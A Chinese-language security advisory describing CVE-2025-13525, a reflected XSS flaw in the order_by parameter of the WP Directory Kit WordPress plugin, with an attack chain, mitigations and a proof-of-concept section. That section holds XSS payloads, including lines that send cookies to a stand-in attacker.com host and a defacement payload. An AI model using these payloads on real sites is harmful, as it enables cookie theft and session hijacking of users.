CVE-2025-13525 WordPress WP Directory Kit插件反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13525

漏洞类型

反射型跨站脚本(XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WP Directory Kit (WordPress插件)

漏洞概述

CVE-2025-13525是WordPress WP Directory Kit插件中的一个反射型跨站脚本(XSS)漏洞。该漏洞存在于所有1.4.5及以下版本中，由于插件对order_by参数缺乏足够的输入清理和输出转义处理，导致未经身份认证的攻击者能够通过构造恶意链接注入任意Web脚本。当用户点击攻击者提供的恶意链接时，注入的脚本将在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取或对网站进行进一步攻击。此漏洞需要用户交互才能触发，如点击恶意链接。CVSS评分6.1，属于中等严重程度，主要影响 confidentiality 和 integrity。

技术细节

该漏洞为典型的反射型XSS，攻击向量为HTTP请求中的order_by参数。WP Directory Kit插件在处理用户请求时，直接将order_by参数值未经适当过滤和转义就输出到HTML页面中。攻击者可以通过构造包含恶意JavaScript代码的order_by参数值，当用户访问包含该参数的页面时，浏览器会执行注入的脚本代码。漏洞利用条件包括：1)攻击者需诱骗用户点击恶意链接；2)用户需在WordPress站点上保持活跃会话。由于插件版本1.4.5及之前版本均受影响，建议立即升级到最新修复版本。漏洞代码位置位于application/views/wdk_messages/index.php第38-39行附近。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress网站是否安装并启用了WP Directory Kit插件（版本<=1.4.5）

STEP 2

步骤2

攻击者构造包含恶意XSS payload的order_by参数URL，如：?order_by=<script>alert(document.cookie)</script>

STEP 3

步骤3

攻击者通过钓鱼邮件、社交工程或恶意网站诱骗目标用户点击构造好的恶意链接

STEP 4

步骤4

目标用户点击链接后，浏览器向目标服务器发送请求，服务器将未经转义的order_by参数值反射回页面

STEP 5

步骤5

浏览器解析HTML响应时执行注入的JavaScript代码，导致XSS攻击成功

STEP 6

步骤6

攻击者通过执行JavaScript实现cookie窃取、会话劫持或进一步渗透目标网站

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-13525 PoC - Reflected XSS via order_by parameter -->
<!-- Target: WordPress site with WP Directory Kit plugin <= 1.4.5 -->
<!-- This PoC demonstrates the XSS vulnerability in the order_by parameter -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-13525 PoC</title>
</head>
<body>
    <h2>CVE-2025-13525 - WP Directory Kit Reflected XSS</h2>
    
    <!-- Malicious URL that triggers the XSS -->
    <p>Malicious URL:</p>
    <code id="malicious-url"></code>
    
    <script>
        // Generate malicious URL targeting order_by parameter
        var targetUrl = window.location.origin + '/?';
        var xssPayload = '<script>alert("XSS - CVE-2025-13525");<\/script>';
        var maliciousUrl = targetUrl + 'order_by=' + encodeURIComponent(xssPayload);
        
        document.getElementById('malicious-url').textContent = maliciousUrl;
        
        // Display the constructed payload
        console.log('XSS Payload:', xssPayload);
        console.log('Full URL:', maliciousUrl);
    </script>
    
    <!-- Example attack scenarios -->
    <h3>Attack Scenarios:</h3>
    <ol>
        <li><strong>Cookie Theft:</strong> <code>order_by="><script>document.location='https://attacker.com/steal?c='+document.cookie</script></code></li>
        <li><strong>Session Hijacking:</strong> <code>order_by="><script>fetch('https://attacker.com/log?data='+btoa(document.cookie))</script></code></li>
        <li><strong>Page Defacement:</strong> <code>order_by="><script>document.body.innerHTML='<h1>Hacked</h1>'</script></code></li>
    </ol>
    
    <p><strong>Note:</strong> This is for authorized security testing only.</p>
</body>
</html>

影响范围

WP Directory Kit <= 1.4.5

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1)暂时禁用WP Directory Kit插件；2)使用Web应用防火墙(WAF)规则拦截包含order_by参数中可疑字符的请求；3)使用浏览器内置的XSS过滤器作为临时防护；4)加强对管理员和用户的安全意识培训，提醒不要点击可疑链接；5)实施严格的CSP策略限制脚本执行。